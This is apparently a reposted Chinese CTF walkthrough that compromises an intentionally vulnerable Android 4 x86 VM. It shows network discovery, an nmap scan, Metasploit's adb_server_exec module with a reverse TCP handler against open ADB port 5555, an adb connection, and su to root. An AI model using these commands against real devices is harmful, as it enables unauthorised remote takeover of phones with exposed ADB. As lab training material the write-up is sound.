专栏首页安全漏洞环境学习Android4 漏洞环境简单挑战

Android4 漏洞环境简单挑战

今天给各位分享的是一个Android虚拟机环境的简单渗透。按照我们一般的渗透流程大概分为:

  • 端口扫描和IP发现
  • 使用adb_server_exec攻击端口8080代理
  • 使用ADB连接到设备。
  • 获取shell
  • 权限提升

开机是一个唯美的画面

要输入pin码!

首先进行ip地址发现,kali中使用netdiscover扫描

netdiscover  -r 192.168.0.0/24

然后使用nmap进行全面综合的扫描

nmap -p- -A 192.168.0.104
root@kali:~# nmap -p- -A 192.168.0.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-08 17:49 CST
Nmap scan report for 192.168.0.104 (192.168.0.104)
Host is up (0.00051s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE  VERSION
5555/tcp  open  freeciv?
8080/tcp  open  http     PHP cli server 5.5 or later
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Deface by Good Hackers
22000/tcp open  ssh      Dropbear sshd 2014.66 (protocol 2.0)
| ssh-hostkey: 
|_  1024 b3:98:65:98:fd:c0:64:fe:16:d6:30:36:aa:2b:ef:6b (DSA)
MAC Address: 00:0C:29:6F:D3:B3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.0.104 (192.168.0.104)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.05 seconds
root@kali:~# 

访问一下8080,没啥额外的信息

似乎是PHP的CLI,尝试了一下也没有找到啥关键内容。

继续回看nmap的扫描结果,发现22000是ssh服务,对应的软件是Dropbear sshd 2014.66 (protocol 2.0),用度娘搜了一下这个应用

再用exploitdb对应的searchsploit命令搜了一下

searchsploit Dropbear 

没法利用!最后就剩下一个5555端口应用了。

在Android系统中,TCP的5555旨在允许通过Android调试桥(ADB)管理设备,这是一种Android SDK功能,允许开发人员轻松地与设备通信并在其上运行命令或完全控制它们。

在我本地之前安装的Android开发环境中,我将一台老版本的手机root之后,连接到电脑上,配置好Android Studio环境(此处省略,可度娘简单了解一下),如下图所示:

可以看到,我们通过adb shell命令即可进入Android设备的交互模式中。所以在这里,开放的5555端口会被认为是一个服务端口,我们可以利用此端口的特性进行攻击。

在kali下开启msfconsole使用adb服务模块进行测试

msf5 > use exploit/android/adb/adb_server_exec 
msf5 exploit(android/adb/adb_server_exec) > set rhosts 192.168.0.104
rhosts => 192.168.0.104
msf5 exploit(android/adb/adb_server_exec) > set lhost  192.168.0.105
lhost => 192.168.0.105
msf5 exploit(android/adb/adb_server_exec) > set lport  4567
lport => 4567
msf5 exploit(android/adb/adb_server_exec) > exploit

[*] Started reverse TCP handler on 192.168.0.105:4567 
[*] 192.168.0.104:5555 - Connecting to device...
[+] 192.168.0.104:5555 - Connected to device:
device::ro.product.name=android_x86;ro.product.model=VMware Virtual Platform;ro.product.device=x86;
[+] 192.168.0.104:5555 - Command executed, response:
 command=WRTE
arg0=0x1
arg1=0xb
data=

[*] 192.168.0.104:5555 - Command Stager progress - 100.00% done (1338/1338 bytes)

如果没有Windows的Android开发环境,那就在kali下连接,安装adb

apt-get install adb

安装完成之后连接,使用adb命令连接

root@kali:~# adb connect 192.168.0.104:5555
connected to 192.168.0.104:5555
root@kali:~# adb shell

使用su命令即可切换到root身份

在/data/root/目录中发现了设置的flag文件

至此,我们的利用过程完毕!

总结

手机还是不要轻易root,一般root之后,在局域网之内一旦被扫描到,很容易被攻击成功。

本文分享自微信公众号 - 安全漏洞环境学习(gh_ddd854e535b8),作者:墙角睡大觉

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-08-08

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CVE-2019-14287 linux sudo root 权限绕过漏洞复现

    2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。

    墙角睡大觉
  • CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation漏洞复现

    Serv-U是Windows平台和Linux平台的安全FTP服务器(FTPS,SFTP,HTTPS),是一个优秀的,安全的文件管理,文件传输和文件共享的解决方案...

    墙角睡大觉
  • Escalate_Linux 多漏洞提权实战

    今天我们为大家分享的是一款多漏洞的Linux靶机,通过系统中的不同漏洞进行提权获得root权限。

    墙角睡大觉
  • MVP ComCamp & GCR MVP Openday 2014

    今年的MVP Openday与往年不一样,加入了Community Camp环节,即社区大课堂。其主要形式是由MVP作为讲师提供包括Developer和IT P...

    ShiJiong
  • Linux系统是否被植入木马的排查流程梳理

    在日常繁琐的运维工作中,对linux服务器进行安全检查是一个非常重要的环节。今天,分享一下如何检查linux系统是否遭受了入侵? 一、是否入侵检查 1)检查系统...

    洗尽了浮华
  • 2012 GCR MVP Openday 手记

        继2010年上海的红楼戴斯,2011年的北京翠宫,今年是我第三次参加大中华区MVP Openday,这次的地点是在北京丽都饭店。     11月1号晚7...

    ShiJiong
  • 我的微软最有价值专家(Microsoft MVP)之路

    晓晨
  • 软硬链接、文件删除原理、linux中的三种时间、chkconfig优化

    第1章 软硬链接 1.1 硬链接 1.1.1 含义 多个文件拥有相同的inode号码 硬链接即文件的多个入口 1.1.2 作用 防止你误删除文件 1.1.3 如...

    惨绿少年
  • Linux开发环境第三方库规划

    让工作变得有条理,不乱糟糟,即使存在大量的第三方,也有章可循。简而言之,就是要保持目录的干净(如/usr/local目录),保持文件的干净(如profile文...

    一见
  • Apr.2009 Microsoft MVP

        昨天收到了微软的邮件,授予我2009年度4月份的 Microsoft MVP 奖,成为全球3000位MVP中的一员,我的领域是Windows Mobil...

    ShiJiong

扫码关注云+社区

领取腾讯云代金券